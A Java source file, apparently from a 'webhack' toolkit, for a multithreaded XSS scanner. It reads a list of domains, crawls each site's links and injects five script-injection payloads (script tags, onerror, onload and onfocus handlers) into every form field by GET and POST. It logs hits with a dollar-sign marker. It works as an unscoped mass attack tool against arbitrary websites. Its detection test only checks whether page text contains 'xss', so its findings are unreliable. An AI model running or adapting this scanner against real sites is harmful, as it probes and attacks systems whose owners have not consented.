package webhack.xss;

import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

import java.io.*;
import java.util.*;
import java.net.MalformedURLException;
import java.net.URL;

public class LiteXSS implements Runnable {
    private int stet = 0;
    private Set<String> visitedUrls = new HashSet<>();

    public LiteXSS(String bd, File log, int maxdomen) {
        PrintWriter pw = null;
        BufferedReader br = null;
        try {
            pw = new PrintWriter(log);
            ArrayList<String> masWebsiteUrl = new ArrayList<>();
            br = new BufferedReader(new FileReader(bd));
            String l;
            while ((l = br.readLine()) != null) {
                masWebsiteUrl.add("http://" + l);
            }

            for (String websiteUrl : masWebsiteUrl) {
                System.out.println("---------------------------");
                crawlWebsite(websiteUrl, log, maxdomen);
                System.out.println("---------------------------");
            }
            System.out.println("Количество найденных XSS: " + stet);
        } catch (Exception e) {
            System.out.println(";( Error - " + e);
        } finally {
            if (pw != null) pw.close();
            try {
                if (br != null) br.close();
            } catch (IOException e) {
                System.out.println(";( Error - " + e);
            }
        }
    }




//-----------------------------------------------------------------

    public LiteXSS() {}

    private String bd1;
    private File log1;
    private int maxdomen1;
    public void setBd1(String bd1) {this.bd1 = bd1;}
    public void setLog1(File log1) {this.log1 = log1;}
    public void setMmaxdomen1(int maxdomen1) {this.maxdomen1 = maxdomen1;}


    public void threadRun() {
        PrintWriter pw = null;
        BufferedReader br = null;
        try {
            pw = new PrintWriter(log1);
            ArrayList<String> masWebsiteUrl = new ArrayList<>();
            br = new BufferedReader(new FileReader(bd1));
            String l;
            while ((l = br.readLine()) != null) {
                masWebsiteUrl.add("http://" + l);
            }

            for (String websiteUrl : masWebsiteUrl) {
                System.out.println("---------------------------");
                crawlWebsite(websiteUrl, log1, maxdomen1);
                System.out.println("---------------------------");
            }
            System.out.println("Количество найденных XSS: " + stet);
        } catch (Exception e) {
            System.out.println(";( Error - " + e);
        } finally {
            if (pw != null) pw.close();
            try {
                if (br != null) br.close();
            } catch (IOException e) {
                System.out.println(";( Error - " + e);
            }
        }
    }


    @Override
    public void run() {
        threadRun();
    }



//-----------------------------------------------------------------

    private void crawlWebsite(String url, File log, int maxdomen) {
        Queue<String> queue = new LinkedList<>();
        queue.add(url); // Начинаем с начального URL
        int subdomainCount = 0; // Счетчик поддоменов

        while (!queue.isEmpty()) {
            String currentUrl = queue.poll(); // Берем URL из очереди

            if (visitedUrls.contains(currentUrl)) {
                continue; // Если уже посещали, пропускаем
            }
            visitedUrls.add(currentUrl); // Добавляем в посещенные

            try {
                Document document = Jsoup.connect(currentUrl).get();
                List<FormData> forms = findForms(document);

                // Проверяем XSS только для первых maxdomen поддоменов
                if (maxdomen != 0) {
                    if (subdomainCount <= maxdomen) {
                        checkForXSS(forms, url, log, "<script>alert('xss')</script>");
                        checkForXSS(forms, url, log, "<img src=\"javascript:alert('xss')\"/>");
                        checkForXSS(forms, url, log, "<img src='#' onerror='alert(\"xss\")' />");
                        checkForXSS(forms, url, log, "<svg/onload=alert('xss')>");
                        checkForXSS(forms, url, log, "\u2061\u2061\" autofocus onfocus=alert(\"XSS\")//");
                        subdomainCount++; // Увеличиваем счетчик поддоменов
                    } else {
                        break;
                    }
                } else {
                    checkForXSS(forms, url, log, "<script>alert('xss')</script>");
                    checkForXSS(forms, url, log, "<img src=\"javascript:alert('xss')\"/>");
                    checkForXSS(forms, url, log, "<img src='#' onerror='alert(\"xss\")' />");
                    checkForXSS(forms, url, log, "<svg/onload=alert('xss')>");
                    checkForXSS(forms, url, log, "\u2061\u2061\" autofocus onfocus=alert(\"XSS\")//");
                }

                // Извлечение всех ссылок
                Elements links = document.select("a[href]");
                for (Element link : links) {
                    String linkUrl = link.absUrl("href"); // Получаем абсолютный URL
                    if (isSameDomain(url, linkUrl) && !visitedUrls.contains(linkUrl)) { // Проверяем домен и посещенность
                        queue.add(linkUrl); // Добавляем в очередь
                    }
                }
            } catch (Exception e) {
                System.out.println(";( Error processing " + currentUrl + ": " + e);
            }
        }
    }


    private boolean isSameDomain(String baseUrl, String targetUrl) {
        try {
            URL base = new URL(baseUrl);
            URL target = new URL(targetUrl);
            return base.getHost().equals(target.getHost()); // Сравнение доменов
        } catch (MalformedURLException e) {
            return false;
        }
    }

    private List<FormData> findForms(Document document) {
        List<FormData> forms = new ArrayList<>();
        Elements formElements = document.select("form");

        for (Element form : formElements) {
            String action = form.attr("action");
            String method = form.attr("method").toLowerCase();
            Elements inputElements = form.select("input[name]");

            List<String> inputNames = new ArrayList<>();
            for (Element input : inputElements) {
                inputNames.add(input.attr("name"));
            }

            forms.add(new FormData(action, method, inputNames));
        }
        return forms;
    }

    private void checkForXSS(List<FormData> forms, String targetUrl, File log_file, String payload) {
        BufferedWriter writer = null;
        try {
            writer = new BufferedWriter(new FileWriter(log_file, true));

            for (FormData form : forms) {
                String url = form.action.isEmpty() ? targetUrl : form.action; // Обработка относительных URL
                if (!url.startsWith("http")) {
                    url = targetUrl + url; // Замените на базовый URL
                }

                if ("post".equals(form.method)) {
                    org.jsoup.Connection connection = Jsoup.connect(url).method(org.jsoup.Connection.Method.POST);

                    for (String inputName : form.inputNames) {
                        connection.data(inputName, payload);
                    }

                    Document response = connection.execute().parse();
                    if (response.body().text().contains("xss")) {
                        System.out.println("($_$>) XSS Vulnerability found on: " + url + " with payload: " + payload);
                        if (!log_file.equals("n") && !log_file.equals("N")) {
                            writer.write("($_$>) XSS Vulnerability found on: " + url + " with payload: " + payload + "\n");
                        }
                        stet += 1;
                    } else {
                        System.out.println(";( No XSS found on: " + url);
                    }
                } else { // GET-запрос
                    StringBuilder testUrl = new StringBuilder(url + "?");
                    for (String inputName : form.inputNames) {
                        testUrl.append(inputName).append("=").append(payload).append("&");
                    }
                    // Удаляем последний '&'
                    testUrl.setLength(testUrl.length() - 1);

                    Document response = Jsoup.connect(testUrl.toString()).get();
                    if (response.body().text().contains("xss")) {
                        System.out.println("($_$>) XSS Vulnerability found on: " + testUrl + " with payload: " + payload);
                        if (!log_file.equals("n") && !log_file.equals("N")) {
                            writer.write("($_$>) XSS Vulnerability found on: " + testUrl + " with payload: " + payload + "\n");
                        }
                        stet += 1;
                    } else {
                        System.out.println(";( Error XSS No found on: " + url);
                    }
                }
            }
        } catch (IOException e) {
            System.out.println(";( Error  -" + e);
        } finally {
            try {
                if (writer != null) writer.close();
            } catch (IOException e) {
                System.out.println("Error - " + e);
            }
        }
    }

    private static class FormData {
        String action;
        String method;
        List<String> inputNames;

        FormData(String action, String method, List<String> inputNames) {
            this.action = action;
            this.method = method;
            this.inputNames = inputNames;
        }
    }
}